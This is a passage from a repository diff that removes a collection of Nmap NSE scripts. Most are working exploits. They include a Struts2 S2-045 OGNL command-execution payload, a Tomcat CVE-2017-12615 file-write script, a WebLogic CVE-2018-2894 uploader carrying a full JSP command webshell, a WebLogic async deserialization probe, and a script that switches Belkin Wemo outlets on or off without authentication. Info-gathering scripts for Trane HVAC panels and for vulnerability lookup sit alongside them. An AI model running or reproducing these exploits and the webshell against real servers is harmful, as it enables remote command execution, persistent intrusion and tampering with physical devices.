--local payload_cmd = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
local useragent = "Mozilla/5.0"
options = {header = {}, timeout = 15000}
options["header"]["Content-type"] = payload
options["header"]["User-Agent"] = useragent
local response = http.get(host, port, "/", options)
if response.status == 200 then
if string.find(response.body, "Struts2S2045Checks") ~= nil then
-- exclude index "php default phpinfo() page"
if string.find(response.body, "phpinfo") == nil then
--response: 0000 53 74 72 75 74 73 32 53 32 30 34 35 43 68 65 63 Struts2S2045Chec
-- 0010 6b 73 21 21 21 ks!!!
if #response.body == 21 then
output["status"] = "S2-045-AChecks vuln21"
return output
--response: 0000 53 74 72 75 74 73 32 53 32 30 34 35 43 68 65 63 Struts2S2045Chec
-- 0010 6b 73 21 21 21 0a ks!!!.
elseif #response.body == 22 then
output["status"] = "S2-045-AChecks vuln22"
return output
--response: 0000 53 74 72 75 74 73 32 53 32 30 34 35 43 68 65 63 Struts2S2045Chec
-- 0010 6b 73 21 21 21 0d 0a ks!!!..
elseif #response.body == 23 then
output["status"] = "S2-045-AChecks vuln23"
return output
elseif #response.body < 50 then
output["status"] = "S2-045-AChecks"
output["resplength"] = #response.body
return output
else
output["status"] = "S2-045-AChecks lengtherror"
output["resplength"] = #response.body
return output
end
end
end
end
if response.status == 302 or response.status == 301 then
if response.location then
local parseurl = http.parse_url(response.location[#response.location])
--fix location http://127.0.0.1/login.action to http://host:port/uri
local response = http.get(parseurl.host,port,parseurl.path,options)
if response.status == 200 then
if string.find(response.body, "Struts2S2045Checks") ~= nil then
if string.find(response.body, "phpinfo") == nil then
if #response.body == 21 then
output["status"] = "S2-045-BChecks vuln21"
return output
elseif #response.body == 22 then
output["status"] = "S2-045-BChecks vuln22"
return output
elseif #response.body == 23 then
output["status"] = "S2-045-BChecks vuln23"
return output
elseif #response.body < 50 then
output["status"] = "S2-045-BChecks"
output["resplength"] = #response.body
return output
else
output["status"] = "S2-045-BChecks lengtherror"
output["resplength"] = #response.body
return output
end
end
end
end
end
end
-- Debug
-- if response.status == 404 and response.body then
-- output["status"] = "S2-045-CChecks"
-- output["res"] = response.body
-- return output
-- end
end

43
nmap_scripts/tomcat-cve-2017-12615.nse
View File

@ -1,43 +0,0 @@
local stdnse = require "stdnse"
local http = require "http"
description = [[
for the vulnerability of tomcat-cve-2017-12615 This script will write a webshell into web server.
$ git clone https://github.com/Rvn0xsy/nse_vuln.git
$ cd /nse_vuln/
$ sudo cp * /usr/share/nmap/scripts/
$ sudo nmap -p 80,8080,8090,8899 --script XX.NSE victim_host
]]
prerule=function()
end
hostrule=function(host)
return false
end
portrule=function(host,port)
local ports = {80,8080,8090,8899}
for i in pairs(ports)do
if(port.number == ports[i])then
return true
end
end
end
action = function(host,port)
local shell_name = string.format("%sCVE-2017-12615-CHECK-%d.jsp","/",math.random(9999))
local status = stdnse.output_table()
local put_rsp = http.put(host,port,shell_name.."/",nil,"CVE-2017-12615")
if(put_rsp.status == 201)then
status.shell_name = shell_name
local response = http.get(host,port,shell_name)
if(response and http.response_contains(response,"CVE%-2017%-12615") )then
return status
end
return false
end
return false
end
postrule=function()
end

182
nmap_scripts/trane-info.nse
View File

@ -1,182 +0,0 @@
local nmap = require "nmap"
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
local shortport = require "shortport"
description = [[
Trane Tracer SC is an intelligent field panel for communicating with HVAC equipment controllers. According to Trane U.S. Inc., Tracer SC is deployed across several sectors including Commercial Facilities and others.
Contents of specific directories on the Tracer SC are exposed with the web server application to unauthenticated users.
Valid on Trane Tracer SC version 4.40.1211 and below. Tested on 7/3/17.
References:
* http://websec.mx
]]
---
-- @usage nmap -p80 --script trane-info.nse <target>
--
-- @output
-- | trane-info:
-- | serverName: TracerSC
-- | serverTime: 2017-07-03T21:01:02-04:00
-- | serverBootTime: 2017-06-25T03:14:38-04:00
-- | vendorName: Trane
-- | productName: Tracer SC
-- | productVersion: v4.40.1211 (release)
-- | kernelVersion: 2.6.30_HwVer12AB-hydra
-- | hardwareType: HwVer12AB
-- | hardwareSerialNumber: E15A#####
-- | 1:equipmentUri: /equipment/generic/generic/##
-- | 1:displayName: BOILER ROOMS
-- | 1:deviceName: BOILER ROOMS
-- | 1:equipmentFamily: Generic
-- | 1:roleDocument: BOILER_ROOMS
-- | 1:isOffline: false
-- | 2:equipmentUri: /equipment/generic/generic/##
-- | 2:displayName: BOILER ROOMS
-- | 2:deviceName: BOILER ROOMS
-- | 2:equipmentFamily: Generic
-- | 2:roleDocument: BOILER_ROOMS
-- | 2:isOffline: false
-- | 3:equipmentUri: /equipment/generic/generic/##
-- | 3:displayName: EXHAUSTS 3 RM-6
-- | 3:deviceName: EXHAUSTS 3 RM-6
-- | 3:equipmentFamily: Generic
-- | 3:roleDocument: EXHAUSTS_3_RM-6
-- | 3:isOffline: false
--
-- @xmloutput
-- <elem key="serverName">TracerSC </elem>
-- <elem key="serverTime">2017-07-03T21:01:02-04:00 </elem>
-- <elem key="serverBootTime">2017-06-25T03:14:38-04:00 </elem>
-- <elem key="vendorName">Trane </elem>
-- <elem key="productName">Tracer SC </elem>
-- <elem key="productVersion">v4.40.1211 (release) </elem>
-- -- <elem key="kernelVersion">2.6.30_HwVer12AB-hydra </elem>
-- <elem key="hardwareType">HwVer12AB </elem>
-- <elem key="hardwareSerialNumber">E15A##### </elem>
-- <elem key="1:equipmentUri">/equipment/generic/generic/## </elem>
-- <elem key="1:displayName">BOILER ROOMS </elem>
-- <elem key="1:deviceName">BOILER ROOMS </elem>
-- <elem key="1:equipmentFamily">Generic </elem>
-- <elem key="1:roleDocument">BOILER_ROOMS </elem>
-- <elem key="1:isOffline">false </elem>
-- <elem key="2:equipmentUri">/equipment/generic/generic/## </elem>
-- <elem key="2:displayName">BOILER ROOMS </elem>
-- <elem key="2:deviceName">BOILER ROOMS </elem>
-- <elem key="2:equipmentFamily">Generic </elem>
-- <elem key="2:roleDocument">BOILER_ROOMS </elem>
-- <elem key="2:isOffline">false </elem>
-- <elem key="3:equipmentUri">/equipment/generic/generic/## </elem>
-- <elem key="3:displayName">EXHAUSTS 3 RM-6 </elem>
-- <elem key="3:deviceName">EXHAUSTS 3 RM-6 </elem>
-- <elem key="3:equipmentFamily">Generic </elem>
-- <elem key="3:roleDocument">EXHAUSTS_3_RM-6 </elem>
-- <elem key="3:isOffline">false </elem>
---
author = "Pedro Joaquin <pjoaquin()websec.mx>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discover", "version", "safe"}
portrule = shortport.portnumber({80})
local function GetInformation(host, port)
local output = stdnse.output_table()
--Get information from /evox/about
local uri = '/evox/about'
local response = http.get(host, port, uri)
if response['status-line'] and response['status-line']:match("200") then
--Verify parsing of XML from /evox/about
local deviceType = response['body']:match('serverName" val=([^<]*)/>')
if not deviceType then
stdnse.debug1("Problem with XML parsing of /evox/about")
return nil,"Problem with XML parsing of /evox/about"
end
--Parse information from /evox/about
local keylist = {"serverName","serverTime","serverBootTime","vendorName","productName","productVersion","kernelVersion","hardwareType","hardwareSerialNumber"}
for _,key in ipairs(keylist) do
stdnse.debug1("Looking for : "..key)
output[key] = response['body']:match(key..'" val=([^<]*)/>')
stdnse.debug1("Found : "..output[key])
output[key] = output[key]:gsub('"', "")
end
--Get information from /evox/equipment/installedSummary
local uri = '/evox/equipment/installedSummary'
local response = http.get(host, port, uri)
if response['status-line'] and response['status-line']:match("200") then
--Verify parsing of XML from /evox/equipment/installedSummary
local error = response['body']:match('Error code: 00017')
if error then
stdnse.debug1("/evox/equipment/installedSummary is not available")
end
local equipmentUri = response['body']:match('equipmentUri" val=([^<]*)/>')
if not equipmentUri then
stdnse.debug1("Problem with XML parsing")
end
if not error then
--Parse information from /evox/equipment/installedSummary
local keylist = {"equipmentUri","displayName","deviceName","equipmentFamily","roleDocument","isOffline"}
local _,lastequipmentUri = response['body']:find(".*equipmentUri")
stdnse.debug1("lastequipmentUri : "..lastequipmentUri)
local count = 1
local nextequipmentUri = 1
while nextequipmentUri < lastequipmentUri do
for _,key in ipairs(keylist) do
stdnse.debug1("Looking for : "..key)
output[count..":"..key] = response['body']:match(key..'" val=([^<]*)/>',nextequipmentUri)
if output[count..":"..key] == nil then
output[count..":"..key] = "Not available"
else
output[count..":"..key] = output[count..":"..key]:gsub('"', "")
stdnse.debug1("Found : "..output[count..":"..key])
end
end
_,nextequipmentUri = response['body']:find("equipmentUri",nextequipmentUri)
count = count + 1
stdnse.debug1("Count : "..count)
end
end
end
stdnse.debug1("status-line: "..response['status-line'])
local error = response['status-line']:match('Error')
if error then
stdnse.debug1("Request returned a network error.")
return nil, "Request returned a network error."
end
-- Set the port version
port.version.name = "http"
port.version.name_confidence = 10
port.version.product = output["productName"]
port.version.version = output["productVersion"]
port.version.devicetype = output["hardwareType"]
table.insert(port.version.cpe, "cpe:/h:".. output["vendorName"] .. ":" .. output["productName"])
nmap.set_port_version(host, port, "hardmatched")
return output
end
end
action = function(host,port)
-- Identify servers that answer 200 to invalid HTTP requests and exit as these would invalidate the tests
local status_404, result_404, _ = http.identify_404(host,port)
if ( status_404 and result_404 == 200 ) then
stdnse.debug1("Exiting due to ambiguous response from web server on %s:%s. All URIs return status 200.", host.ip, port.number)
return nil
end
return GetInformation(host, port)
end

235
nmap_scripts/vulners.nse
View File

@ -1,235 +0,0 @@
description = [[
NSE script using some well-known service to provide info on vulnerabilities
For each available cpe it prints the known vulns (links to the correspondent info).
Its work is pretty simple:
- work only when some software version is identified for an open port
- take all the known cpe for that software (from the standard nmap output)
- ask whether some known vulns exist for that cpe
- print that info out
https://github.com/vulnersCom/nmap-vulners/releases/latest
Dependencies:
nmap libraries:
http
json
string
The only thing you should always keep in mind is that the script depends on having software versions at hand, so it only works with -sV flag.
Installation
locate, where your nmap scripts are located in your system
for *nix system it might be ~/.nmap/scripts/ or $NMAPDIR
for Mac it might be /usr/local/Cellar/nmap/<version>/share/nmap/scripts/
for Windows you have to find it yourself
copy the provided script (vulners.nse) into that directory
Usage
Use it as straightforward as you can:
nmap -sV --script vulners <target>
]]
---
-- @usage
-- nmap -sV --script vulners <target>
--
-- @output
--
-- 53/tcp open domain ISC BIND DNS
-- | vulners:
-- | ISC BIND DNS:
-- | CVE-2012-1667 8.5 https://vulners.com/cve/CVE-2012-1667
-- | CVE-2002-0651 7.5 https://vulners.com/cve/CVE-2002-0651
-- | CVE-2002-0029 7.5 https://vulners.com/cve/CVE-2002-0029
-- | CVE-2015-5986 7.1 https://vulners.com/cve/CVE-2015-5986
-- | CVE-2010-3615 5.0 https://vulners.com/cve/CVE-2010-3615
-- | CVE-2006-0987 5.0 https://vulners.com/cve/CVE-2006-0987
-- | CVE-2014-3214 5.0 https://vulners.com/cve/CVE-2014-3214
--
author = 'gmedian AT vulners DOT com'
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "safe"}
local http = require "http"
local json = require "json"
local string = require "string"
local table = require "table"
local api_version="1.1"
portrule = function(host, port)
local vers=port.version
return vers ~= nil and vers.version ~= nil
end
---
-- Return a string with all the found cve's and correspondent links
--
-- @param vulns a table with the parsed json response from the vulners server
--
function make_links(vulns)
local output_str=""
local is_exploit=false
local cvss_score=""
-- NOTE[gmedian]: data.search is a "list" already, so just use table.sort with a custom compare function
-- However, for the future it might be wiser to create a copy rather than do it in-place
local vulns_result = {}
for _, v in ipairs(vulns.data.search) do
table.insert(vulns_result, v)
end
-- Sort the acquired vulns by the CVSS score
table.sort(vulns_result, function(a, b)
return a._source.cvss.score > b._source.cvss.score
end
)
for _, vuln in ipairs(vulns_result) do
-- Mark the exploits out
is_exploit = vuln._source.bulletinFamily:lower() == "exploit"
-- Sometimes it might happen, so check the score availability
cvss_score = vuln._source.cvss and ("\t\t" .. vuln._source.cvss.score) or ""
output_str = string.format("%s\n\t%s", output_str, vuln._source.id .. cvss_score .. '\t\thttps://vulners.com/' .. vuln._source.type .. '/' .. vuln._source.id .. (is_exploit and '\t\t*EXPLOIT*' or ''))
end
return output_str
end
---
-- Issues the requests, receives json and parses it, calls <code>make_links</code> when successfull
--
-- @param what string, future value for the software query argument
-- @param vers string, the version query argument
-- @param type string, the type query argument
--
function get_results(what, vers, type)
local v_host="vulners.com"
local v_port=443
local response, path
local status, error
local vulns
local option={header={}}
option['header']['User-Agent'] = string.format('Vulners NMAP Plugin %s', api_version)
path = '/api/v3/burp/software/' .. '?software=' .. what .. '&version=' .. vers .. '&type=' .. type
response = http.get(v_host, v_port, path, option)
status = response.status
if status == nil then
-- Something went really wrong out there
-- According to the NSE way we will die silently rather than spam user with error messages
return ""
elseif status == 418 then
-- Too many requests
return "You are doing it too fast. Lower the rate or contact isox AT vulners DOT com."
elseif status ~= 200 then
-- Again just die silently
return ""
end
status, vulns = json.parse(response.body)
if status == true then
if vulns.result == "OK" then
return make_links(vulns)
end
end
return ""
end
---
-- Calls <code>get_results</code> for type="software"
--
-- It is called from <code>action</code> when nothing is found for the available cpe's
--
-- @param software string, the software name
-- @param version string, the software version
--
function get_vulns_by_software(software, version)
return get_results(software, version, "software")
end
---
-- Calls <code>get_results</code> for type="cpe"
--
-- Takes the version number from the given <code>cpe</code> and tries to get the result.
-- If none found, changes the given <code>cpe</code> a bit in order to possibly separate version number from the patch version
-- And makes another attempt.
-- Having failed returns an empty string.
--
-- @param cpe string, the given cpe
--
function get_vulns_by_cpe(cpe)
local vers
local vers_regexp=":([%d%.%-%_]+)([^:]*)$"
local output_str=""
-- TODO[gmedian]: add check for cpe:/a as we might be interested in software rather than in OS (cpe:/o) and hardware (cpe:/h)
-- TODO[gmedian]: work not with the LAST part but simply with the THIRD one (according to cpe doc it must be version)
-- NOTE[gmedian]: take only the numeric part of the version
_, _, vers = cpe:find(vers_regexp)
if not vers then
return ""
end
output_str = get_results(cpe, vers, "cpe")
if output_str == "" then
local new_cpe
new_cpe = cpe:gsub(vers_regexp, ":%1:%2")
output_str = get_results(new_cpe, vers, "cpe")
end
return output_str
end
action = function(host, port)
local tab={}
local changed=false
local response
local output_str=""
for i, cpe in ipairs(port.version.cpe) do
output_str = get_vulns_by_cpe(cpe, port.version)
if output_str ~= "" then
tab[cpe] = output_str
changed = true
end
end
-- NOTE[gmedian]: issue request for type=software, but only when nothing is found so far
if not changed then
local vendor_version = port.version.product .. " " .. port.version.version
output_str = get_vulns_by_software(port.version.product, port.version.version)
if output_str ~= "" then
tab[vendor_version] = output_str
changed = true
end
end
if (not changed) then
return
end
return tab
end

88
nmap_scripts/weblogic-CNVD-C-2019-48814.nse
View File

@ -1,88 +0,0 @@
local http = require "http"
local nmap = require "nmap"
local stdnse = require "stdnse"
local vulns = require "vulns"
description = [[
Weblogic CNVD-C-2019-48814
$ git clone https://github.com/Rvn0xsy/nse_vuln.git
$ cd /nse_vuln/
$ sudo cp * /usr/share/nmap/scripts/
$ sudo nmap -sV -p 7001 --script weblogic-CNVD-C-2019-48814.nse victim_host
]]
---
-- @usage
-- nmap -sV --script weblogic-CNVD-C-2019-48814 <target> -p 7001
-- nmap -sV --script weblogic-CNVD-C-2019-48814
--
-- @output
-- PORT STATE SERVICE
-- 7001/tcp open afs3-callback
-- | weblogic-CNVD-C-2019-48814:
-- | VULNERABLE:
-- | Oracle WebLogic wls9-async Deserialization Remote Command Execution Vulnerability
-- | State: VULNERABLE
-- | IDs: 1:CNVD-C-2019-48814 CVE:CVE-2019-????
-- | Risk factor: High CVSSv3: ???
-- |
-- | Disclosure date: 2019-04-17
-- | References:
-- | http://www.cnvd.org.cn/webinfo/show/4989
-- | http://www.cnvd.org.cn/webinfo/show/4999
-- |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-????
author = "Rvn0xsy <rvn0xsy@gmail.com>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln"}
blog = "https://payloads.online"
portrule = function(host,port)
-- if(port.number == 7001)then
-- return true
-- end
-- return false
return true
end
action = function(host,port)
local vuln_table = {
title ="Oracle WebLogic wls9-async Deserialization Remote Command Execution Vulnerability",
IDS = {CVE = 'CVE-2019-????','CNVD-C-2019-48814'},
risk_factor = "High",
scores = {
CVSSv3 = "???",
},
description = [[]],
references = {
'http://www.cnvd.org.cn/webinfo/show/4989',
'http://www.cnvd.org.cn/webinfo/show/4999',
},
dates = {
disclosure = {year = '2019', month = '04', day = '17'},
},
check_results = {},
extra_info = {}
}
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
vuln_table.state = vulns.STATE.NOT_VULN
path = "/_async/AsyncResponseService"
local result = http.get(host,port,path)
local status = stdnse.output_table()
if(result.status == 200)then
if(string.find(result.body,"async") == nil)then
local status = stdnse.output_table()
status.Vuln = "False"
return status
end
options = {}
options['header'] = {}
options['header']['Content-Type'] = 'text/xml'
local payload = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">\n<soapenv:Header>\n<wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n<void class=\"POC\">\n<array class=\"xx\" length=\"0\">\n</array>\n<void method=\"start\"/>\n</void>\n</work:WorkContext>\n</soapenv:Header>\n<soapenv:Body>\n<asy:onAsyncDelivery/>\n</soapenv:Body>\n</soapenv:Envelope>\n"
local response = http.post(host,port,path,options,nil,payload)
if(response.status == 202)then
vuln_table.state = vulns.STATE.VULN
return vuln_report:make_output(vuln_table)
end
end
return vuln_report:make_output(vuln_table)
end

87
nmap_scripts/weblogic-cve-2018-2894.nse
View File

@ -1,87 +0,0 @@
local http = require "http"
local nmap = require "nmap"
local stdnse = require "stdnse"
description = [[
Weblogic CVE-2018-2894
$ git clone https://github.com/Rvn0xsy/nse_vuln.git
$ cd /nse_vuln/
$ sudo cp * /usr/share/nmap/scripts/
$ sudo nmap -n -p 443 --script weblogic-cve-2018-2894.nse victim_host
]]
---
-- @usage
-- nmap -sV --script weblogic-cve-2018-2894 <target> -p 7001
-- nmap -sV --script weblogic-cve-2018-2894
-- --script-args 'weblogic-cve-2018-2894.uri=/,test.jsp,weblogic-cve-2018-2894.filename=test.jsp,weblogic-cve-2018-2894.content=test' <target> -p 7001
--
-- @output
-- PORT STATE SERVICE
-- 7001/tcp open afs3-callback
-- | weblogic-upload:
-- |_ url: /ws_utc/config/keystore/1532325925_Nmap.jsp
-- MAC Address: 02:42:AC:13:00:02 (Unknown)
--
--
-- @args weblogic-cve-2018-2894.uri points to the file '/weblogic/'. Default /
-- @args weblogic-cve-2018-2894.filename the name of the file to be uploaded
-- @args weblogic-cve-2018-2894.content file's contents
-- Other useful arguments when using this script are:
-- * http.useragent = String - User Agent used in HTTP requests
author = "Rvn0xsy <payloads@aliyun.com>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit"}
portrule = function(host,port)
if(port.number == 7001)then
return true
end
return false
end
add_formData = function(form,boundary)
local contents = "\r\n"
for key,value in pairs(form) do
contents = string.format("%sContent-Disposition: form-data; name=\"%s\"\r\n\r\n%s\r\n--%s\r\n",contents,key,value,boundary)
end
-- return contents.."--\r\n"
return contents
end
add_fileData = function(file,boundary)
return string.format("Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"\r\nContent-Type: text/plain\r\n\r\n--%s--\r\n",file["name"],file["filename"],boundary)
end
action = function(host,port)
form = {}
file = {}
shell = {}
form["ks_name"] = "Exploit CVE-2018-2894"
form["ks_edit_mode"] = "false"
form["ks_password_front"] = "123456"
form["ks_password"] = "123456"
form["ks_password_changed"] = "true"
file["name"]="ks_filename"
file["filename"] = stdnse.get_script_args('weblogic-cve-2018-2894.filename') or "test.jsp"
file["content"] = stdnse.get_script_args('weblogic-cve-2018-2894.content') or "<%@ page import=\"java.io.*\" %><%try {String cmd = request.getParameter(\"cmd\");Process child = Runtime.getRuntime().exec(cmd);InputStream in = child.getInputStream();int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();try {child.waitFor();}catch (InterruptedException e) {e.printStackTrace();}}catch (IOException e) {System.err.println(e);}%>"
time = os.time()
uri = stdnse.get_script_args('weblogic-cve-2018-2894.filename') or "/"
boundary = "-ABC"
ks_name = "Exploit CVE-2018-2894"
filename = time.."_"..file["filename"]
post_url = uri .. "ws_utc/resources/setting/keystore?timestamp="..os.time()
options = {}
options.header = {}
options.content = "\r\n--"..boundary
options.header['Content-Type'] = "multipart/form-data; boundary="..boundary
options.content = options.content .. add_formData(form,boundary)
options.content = options.content .. add_fileData(file,boundary)
resp = http.post(host,port,post_url,options,nil,nil)
if(resp.status == 200)then
shell["url"] = uri .. "ws_utc/config/keystore/"..filename
return shell
end
return false
end

144
nmap_scripts/wemo-info.nse
View File

@ -1,144 +0,0 @@
local nmap = require "nmap"
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
local shortport = require "shortport"
description = [[
The Belkin Wemo Switch is a network enabled power outlet. This scripts obtains
information from Belkin Wemo Switch including nearby wireless networks and the
current switch state (ON/OFF).
There is a separate NSE script that may be used for changing the switch state.
No authentication is required.
Valid on Belkin Wemo Switch version WeMo_WW_2.00.10966.PVT-OWRT-SNS on 6/24/17
References:
* http://websec.ca/blog/view/Belkin-Wemo-Switch-NMap-Scripts
* https://www.tripwire.com/state-of-security/featured/my-sector-story-root-shell-on-the-belkin-wemo-switch/
* https://www.exploitee.rs/index.php/Belkin_Wemo
]]
---
-- @usage nmap -p49152,49153,49154 --script wemo-info.nse <target>
--
-- @output
-- | wemo-info:
-- | friendlyName: : Wemo Switch
-- | deviceType: urn:Belkin:device:controllee:1
-- | manufacturer: Belkin International Inc.
-- | manufacturerURL: http://www.belkin.com
-- | modelDescription: Belkin Plugin Socket 1.0
-- | modelName: Socket
-- | modelNumber: 1.0
-- | modelURL: http://www.belkin.com/plugin/
-- | serialNumber: 220333K0203A4E
-- | UDN: uuid:Socket-1_0-220333K0203A4E
-- | UPC: 123456789
-- | macAddress: EC1A59EE48E3
-- | firmwareVersion: WeMo_WW_2.00.10966.PVT-OWRT-SNS
-- | iconVersion: 0|49154
-- | binaryState: 1
-- | Switch is currently turned: ON
-- | Nearby wireless networks: Page:1/1/4$
-- | Visita Cozumel FTW|5|0|OPEN/NONE,
-- | PVGP-2|6|0|WPA1PSKWPA2PSK/TKIPAES,
-- | INFINITUM|8|65|WPA2PSK/AES,
-- |_INFINITUM|11|0|WPA1PSKWPA2PSK/TKIPAES,
--
-- @xmloutput
-- <elem key="deviceType">urn:Belkin:device:controllee:1</elem>
-- <elem key="manufacturer">Belkin International Inc.</elem>
-- <elem key="manufacturerURL">http://www.belkin.com</elem>
-- <elem key="modelDescription">Belkin Plugin Socket 1.0</elem>
-- <elem key="modelName">Socket</elem>
-- <elem key="modelNumber">1.0</elem>
-- <elem key="modelURL">http://www.belkin.com/plugin/</elem>
-- <elem key="serialNumber">220333K0203A4E</elem>
-- <elem key="UDN">uuid:Socket-1_0-220333K0203A4E</elem>
-- <elem key="UPC">123456789</elem>
-- <elem key="macAddress">EC1A59ED59C4</elem>
-- <elem key="firmwareVersion">WeMo_WW_2.00.10966.PVT-OWRT-SNS</elem>
-- <elem key="iconVersion">0|49153</elem>
-- <elem key="binaryState">1</elem>
-- <elem key="Switch is currently turned">ON</elem>
-- <elem key="Nearby wireless networks">Page:1/1/4$&#xa;Visita Cozumel FTW|5|0|OPEN/NONE,&#xa;PVGP-2|6|0|WPA1PSKWPA2PSK/TKIPAES,&#xa;INFINITUM|8|65|WPA2PSK/AES,&#xa;INFINITUM|11|0|WPA1PSKWPA2PSK/TKIPAES,&#xa;</elem>
---
author = "Pedro Joaquin <pjoaquin()websec.mx>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discover", "version", "safe"}
portrule = shortport.portnumber({49152,49153,49154})
local function GetInformation(host, port)
local uri = '/setup.xml'
local response = http.get(host, port, uri)
if response['status-line'] and response['status-line']:match("200 OK") then
--Verify parsing of XML from /setup.xml
local deviceType = response['body']:match("<deviceType>([^<]*)</deviceType>")
if not deviceType then
stdnse.debug1("Problem with XML parsing")
return nil,"Problem with XML parsing"
end
--Parse information from /setup.xml
local output = stdnse.output_table()
local keylist = {"friendlyName","deviceType","manufacturer","manufacturerURL","modelDescription", "modelName","modelName","modelNumber","modelURL","serialNumber","UDN","UPC","macAddress","firmwareVersion","iconVersion","binaryState"}
for _,key in ipairs(keylist) do
stdnse.debug1("Looking for : "..key)
output[key] = response['body']:match("<"..key..">([^<]*)</"..key..">")
end
--Identify current Switch state
local bstate="Switch is currently turned"
if output["binaryState"] == "1" then
output[bstate] = "ON"
else
output[bstate] = "OFF"
end
--Post request to obtain nearby wireless network information
local req = '<?xml ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:GetApList xmlns:u="urn:Belkin:service:WiFiSetup1:1"></u:GetApList></s:Body></s:Envelope>'
local path = "/upnp/control/WiFiSetup1"
local options = {header={["SOAPACTION"]='"urn:Belkin:service:WiFiSetup1:1#GetApList"', ["Content-Type"]="text/xml"}}
local result = http.post( host, port, path, options, nil, req)
stdnse.debug1("Status-a : %s", result['status-line'] or "No Response")
if result['status-line'] and result['status-line']:match("200 OK") then
output["Nearby wireless networks"] = result['body']:match("<ApList>([^<]*)</ApList>")
else
stdnse.debug1("Status-b : %s", result['status-line'] or "No Response")
return false, "Couldn't download file: " .. path
end
-- set the port version
port.version.name = "http"
port.version.name_confidence = 10
port.version.product = output["modelDescription"] or nil
port.version.version = output["firmwareVersion"] or nil
port.version.devicetype = output["deviceType"] or nil
table.insert(port.version.cpe, "cpe:/h:".. output["manufacturer"] .. ":" .. output["modelDescription"])
nmap.set_port_version(host, port, "hardmatched")
return output
else
stdnse.debug1("Could not open '%s'", uri)
return false, "Could not open "..uri
end
end
action = function(host,port)
-- Identify servers that answer 200 to invalid HTTP requests and exit as these would invalidate the tests
local status_404, result_404, _ = http.identify_404(host,port)
if ( status_404 and result_404 == 200 ) then
stdnse.debug1("Exiting due to ambiguous response from web server on %s:%s. All URIs return status 200.", host.ip, port.number)
return nil
end
return GetInformation(host, port)
end

76
nmap_scripts/wemo-switch.nse
View File

@ -1,76 +0,0 @@
local nmap = require "nmap"
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
local shortport = require "shortport"
description = [[
The Belkin Wemo Switch is a network enabled power outlet. This scripts changes
the switch state (ON/OFF) acording to the argument BinaryState.
There is a separate NSE script that may be used for obtaining information such
as the switch current state, nearby wireless networks and versions.
No authentication is required.
Valid on Belkin Wemo Switch version WeMo_WW_2.00.10966.PVT-OWRT-SNS on 6/22/17
References:
* http://websec.ca/blog/view/Belkin-Wemo-Switch-NMap-Scripts
* https://www.tripwire.com/state-of-security/featured/my-sector-story-root-shell-on-the-belkin-wemo-switch/
* https://www.exploitee.rs/index.php/Belkin_Wemo
]]
---
-- @usage nmap -p49152,49153,49154 --script wemo-switch --script-args BinaryState=1 <target>
--
-- @output
--| wemo-switch:
--| BinaryState: 1
--|_ Switch is currently turned: ON
--
-- @xmloutput
-- <elem key="BinaryState">1</elem>
-- <elem key="Switch is currently turned">ON</elem>
--
-- @args wemo-switch.BinaryState Turn the device ON (1) or OFF (0).
---
author = "Pedro Joaquin <pjoaquin()websec.mx>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit", "dos"}
portrule = shortport.portnumber({49152,49153,49154})
local function WemoSwitch(host, port, BinaryState)
local output = stdnse.output_table()
local req = '<?xml ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:SetBinaryState xmlns:u="urn:Belkin:service:basicevent1:1"><BinaryState>'..BinaryState..'</BinaryState></u:SetBinaryState></s:Body></s:Envelope>'
local path = "/upnp/control/basicevent1"
local options = {header={["SOAPACTION"]='"urn:Belkin:service:basicevent:1#SetBinaryState"', ["Content-Type"]="text/xml"}}
local result = http.post( host, port, path, options, nil, req)
stdnse.debug1("Status : %s", result['status-line'] or "No Response")
if(result['status'] ~= 200 or result['content-length'] == 0) then
stdnse.debug1("Status : %s", result['status-line'] or "No Response")
return nil, "Couldn't open: " .. path
else
output["BinaryState"] = result['body']:match("<BinaryState>([^<]*)</BinaryState>")
if output["BinaryState"] == "Error" then
output["BinaryState"] = BinaryState
end
local bstate="Switch is currently turned"
if output["BinaryState"] == "1" then
output[bstate] = "ON"
else
output[bstate] = "OFF"
end
return output
end
end
action = function(host,port)
local BinaryState = stdnse.get_script_args('wemo-switch.BinaryState')
if BinaryState == nil then
return nil, "You have to specify --script-args BinaryState=1"
else
return WemoSwitch(host, port, BinaryState)
end
end